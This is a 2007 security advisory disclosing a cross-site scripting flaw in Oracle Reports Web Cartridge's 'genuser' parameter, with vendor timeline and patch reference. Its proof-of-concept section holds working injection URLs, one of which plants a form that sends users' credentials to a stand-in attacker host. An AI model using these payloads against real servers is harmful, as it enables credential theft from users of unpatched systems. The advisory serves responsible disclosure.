[ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS
=============================================
INTERNET SECURITY AUDITORS ALERT 2007-001
- Original release date: January 17, 2007
- Last revised: January 17, 2007
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================
I. VULNERABILITY
-------------------------
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.
II. BACKGROUND
-------------------------
The Reports Web CGI or Web Cartridge is required for the Reports
Server when using the Oracle Application Server (OAS) to process
report requests from Web clients.
III. DESCRIPTION
-------------------------
Improper validation in "genuser" parameter allows to inject arbitrary
code script/HTML that will be executed in the client browser.
This is specially serious in authentication forms where a malicious
user can obtain the credentials of authentication of other users.
IV. PROOF OF CONCEPT
-------------------------
URL original:
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>
This request return a page with an authentication form (with User
Name, Password, and Database fields).
With a POST method (the rwcgi60 accept both methods: GET and POST),
the user send:
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>
A malicious user can modify the value of the "genuser" parameter and
inject arbitrary script/HTML code:
-- Example 1 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User
Name<script>alert('Vulnerable to XSS attack!');</script>
--- Example 2 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form
name='AttackerForm'
action='http://attacker-machine.com/credentials'>User Name
V. BUSINESS IMPACT
-------------------------
An attacker can spoof the session of other authenticated users,
obtains his authentication credentials, or deface the authentication
form page.
VI. SYSTEMS AFFECTED
-------------------------
Oracle9i Application Server Release 2, version 9.0.2.3
VII. SOLUTION
-------------------------
The January 2007 CPU (Critical Patch Update) contain fixes for this
vulnerability.
VIII. REFERENCES
-------------------------
-
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
January 17, 2007: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
April 23, 2006: Vulnerability acquired by
Internet Security Auditors
April 24, 2006: Initial vendor notification sent.
April 29, 2006: Initial response of the vendor
January 16, 2007: The vendor fixed the vulnerability in the CPU.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security
Auditors, S.L. accepts no responsibility for any damage caused by the
use or misuse of this information.